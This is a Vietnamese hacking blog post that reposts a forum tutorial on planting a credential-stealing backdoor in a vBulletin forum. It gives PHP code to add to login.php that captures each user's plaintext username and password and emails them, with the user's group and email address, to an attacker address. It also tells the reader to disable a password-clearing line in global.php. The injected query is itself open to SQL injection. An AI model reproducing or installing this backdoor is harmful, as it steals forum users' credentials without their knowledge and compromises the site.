Trao đổi với tôi

www.hdphim.info OR www.chepphimhdtv.com

12/31/09

[Hacking] Chèn Keylogger vào vBB

Chèn Keylogger vào vBB
Poster:
heroes1412

Đã test trên VBB 4.0 beta 5: OK
Edit file login.php:
Tìm:
Code:
process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);
Thêm bên dưới:
Code:
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");
while($row = @mysql_fetch_array($sql_query))
{
if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$from = $row["usergroupid"].' | '.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$to = "Attacker@email";
$message = $row["usergroupid"] . ' | ' . $lg_username . ' | ' . $lg_password. ' | ' . $row["email"] . "\n";
$header = "Content-type: text/html; charset=utf-8\r\nFrom: $from\r\nReply-to: $to";
mail($to, $from, $message, $header);
}
}
Edit file Global.php, tìm:
Code:
$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;
Thêm 2 dấu / vào trước nó để biến nó thành chú thích, ta sẽ được:
Code:
//$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;
HOẶC delete line đó đi.
Đây kiểu như 1 dạng backdoor á, để lưu giữ khi cần dùng đến
Mỗi khi ai login nó sẽ gửi mail về cho attacker

Link: http://vnbrain.net/showthread.php?t=504

1 comment:

  1. This comment has been removed by a blog administrator.

    ReplyDelete